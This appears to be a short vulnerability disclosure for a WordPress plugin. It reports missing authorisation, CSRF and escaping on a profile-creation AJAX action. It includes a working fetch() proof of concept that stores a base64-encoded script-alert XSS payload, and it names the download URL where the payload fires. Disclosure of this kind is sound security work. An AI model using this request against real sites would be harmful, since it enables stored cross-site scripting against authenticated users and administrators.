The plugin does not have authorisation, CSRF and sanitisation/escaping when creating profile, allowing any authenticated users to create arbitrary ones, with Cross-Site Scripting payloads in them
Create profile:
fetch("https://example.com/wp-admin/admin-ajax.php?action=kc_create_profile", {
"headers": {
"content-type": "application/x-www-form-urlencoded"
},
"body": new URLSearchParams({"name":"y", "slug": "y", "data": btoa("<script>alert(1);</script>")}),
"method": "POST",
"credentials": "include"
});
The XSS will be trigged at: https://example.com/wp-admin/admin-ajax.php?action=kc_download_profile&name=y